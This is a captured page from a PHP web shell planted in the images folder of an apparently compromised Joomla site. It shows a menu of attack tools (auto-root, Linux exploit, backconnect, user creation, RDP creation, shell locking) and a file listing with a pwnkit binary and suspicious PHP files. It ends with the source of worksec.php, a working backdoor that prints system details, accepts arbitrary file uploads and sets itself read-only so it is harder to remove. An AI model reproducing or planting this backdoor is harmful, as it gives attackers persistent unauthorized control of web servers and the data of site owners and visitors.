Linux webm002.cluster120.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.120.20.2 | : 216.73.216.49
Cant Read [ /etc/named.conf ]
8.5.7
verseaumee
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
verseaumee /
zenit /
images /
[ HOME SHELL ]
Name
Size
Permission
Action
2021
[ DIR ]
drwxr-xr-x
Marylinphotos2023
[ DIR ]
drwxr-xr-x
banners
[ DIR ]
drwxr-xr-x
blog
[ DIR ]
drwxr-xr-x
clients
[ DIR ]
drwxr-xr-x
com_hikashop
[ DIR ]
drwxr-xr-x
headers
[ DIR ]
drwxr-xr-x
icons
[ DIR ]
drwxr-xr-x
majo2023
[ DIR ]
drwxr-xr-x
marilynjuin2023
[ DIR ]
drwxr-xr-x
marylin_juin_2024
[ DIR ]
drwxr-xr-x
portfolio
[ DIR ]
drwxr-xr-x
quickdanse2022
[ DIR ]
drwxr-xr-x
sampledata
[ DIR ]
drwxr-xr-x
team
[ DIR ]
drwxr-xr-x
terpsichore
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
01.jpg
2.32
KB
-rw----r--
02.jpg
2.61
KB
-rw----r--
1.jpg
3.65
KB
-rw----r--
2.jpg
4.53
KB
-rw----r--
about.jpg
11.42
KB
-rw----r--
admin.php
5.24
KB
-rw-r--r--
bg.jpg
417.23
KB
-rw----r--
bg1.jpg
263.52
KB
-rw----r--
bg1_old.jpg
14.82
KB
-rw----r--
bg2.jpg
12.62
KB
-rw----r--
bg4.jpg
12.42
KB
-rw----r--
bg7.jpg
9.98
KB
-rw----r--
bg_old.jpg
12.31
KB
-rw----r--
contact.jpg
12.47
KB
-rw----r--
eleve12_old.jpg
591.56
KB
-rw----r--
eleve2.jpg
648.82
KB
-rw----r--
favicon.ico
318
B
-rw----r--
file.php
80.47
KB
-rw-r--r--
giphy.gif
1.72
MB
-rw----r--
giphynoise.png
111.55
KB
-rw----r--
index.html
31
B
-rw----r--
index.php
7
KB
-rw-r--r--
joomla_black.png
4.86
KB
-rw----r--
logo-dark.png
15.9
KB
-rw----r--
logo-dark_old.png
670
B
-rw----r--
logo-light.png
15.89
KB
-rw----r--
logo-light_old.png
670
B
-rw----r--
min-area.jpg
5.12
KB
-rw----r--
pattern.png
2.6
KB
-rw----r--
pattern.svg
51.38
KB
-rw----r--
pattern1.svg
5.24
KB
-rw----r--
powered_by.png
3.12
KB
-rw----r--
pwnkit
0
B
-rwxr-xr-x
toggige-arrow.jpg
30.72
KB
-r--r--r--
worksec.php
1.06
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : worksec.php
<?php // Path to the file $file = 'worksec.php'; // Change the file permissions to 0444 (read-only) chmod($file, 0444); ?> <?php error_reporting(0); set_time_limit(0); $user = get_current_user(); echo "<center><b>Uname:".php_uname()."<br></b>"; echo "<br><b>Base Dir : ".getcwd()."<br></b>"; echo "<br><b>User : ".$user."<br></b>"; echo '<br><font color="black" size="4">'; if(isset($_POST['Submit'])){ $filedir = ""; $maxfile = '2000000'; $mode = '0644'; $userfile_name = $_FILES['image']['name']; $userfile_tmp = $_FILES['image']['tmp_name']; if(isset($_FILES['image']['name'])) { $qx = $filedir.$userfile_name; @move_uploaded_file($userfile_tmp, $qx); @chmod ($qx, octdec($mode)); echo" <a href=$userfile_name><center><b>Sucessfully Uploaded :D ==> $userfile_name</b></center></a>"; } }else{ echo'<form method="POST" action="#" enctype="multipart/form-data"><input type="file" name="image"><br><input type="Submit" name="Submit" value="Upload"></form>'; } echo '</center></font>'; ?>
Close